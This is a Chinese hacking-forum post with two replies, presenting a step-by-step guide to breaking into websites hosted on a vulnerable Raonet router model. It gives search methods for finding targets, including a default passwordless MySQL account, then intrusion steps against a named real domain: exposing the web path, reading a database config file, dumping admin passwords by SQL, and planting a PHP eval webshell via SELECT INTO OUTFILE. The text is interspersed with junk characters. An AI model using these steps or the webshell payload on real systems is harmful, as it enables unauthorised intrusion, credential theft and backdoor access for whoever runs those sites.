找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3023|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:1 p5 w4 ~9 U9 o
# |5 k& M% e9 B; a
1:google搜索'Raonet Subscriber Ethernet Router'0 J8 i9 T! c3 r% L

% P# Y4 N& ^; n' V2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001! W# r) v- ^+ r' f. W- d+ u4 i

( }4 b9 i3 W: a% y3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
9 Z, X8 P8 [* c( K, r/ w, a$ I9 y2 L  n8 j: U, F# F
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......, P9 F: w* M) J8 C
6 ]8 v6 J. s# ~- s# m0 a, ^9 a) j

8 d' |% p' I. x- s% P% P9 `; d+ B6 ~+ K5 }7 d4 j! u1 |- U+ T
入侵步骤:
/ [& m* ]& o6 H$ \4 b0 z$ F0 L" v. i, R9 d* u9 m0 E0 d9 O
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
+ k0 ]) f  z1 I1 ^4 h/ h, A: J
/ P  k) r1 o* r) y) o. O3 z; H' `2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
* [4 I  a0 ~4 _2 ^# ~9 a; |3:得到密码后连接,查看GUI管理密码:
+ W% C- x  `* _, @/ j: m8 Guse ser_500) j# J" k# K, r8 I/ k
select id,passwd from user;0 c3 J  ^8 I# Q: E- Z6 s' B& A" b! c
4:通过数据库写入webshell,执行命令:
3 p1 @9 X9 F3 U; xuse mysql;
1 p. U6 U" I* k1 ecreate table ok(cmd TEXT);
) I9 H. L7 o9 ^insert into ok values("<?php @eval($_POST[cmd])?>");
' Z: b" j! z8 \, e- mselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
. R) D" a* B4 Bdrop table ok;5 g' g3 f4 v$ @
. h% j3 S: O9 @. M& n
5:连接后门shell.php 0 j3 v( Z1 N7 w

( ]+ I" r2 }8 C: t$ k6. 搞定!* p1 L7 i7 Q9 C2 ]' L0 r  R% r- W" P2 T

2 q3 y. G. u6 s7 K, W' ?
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表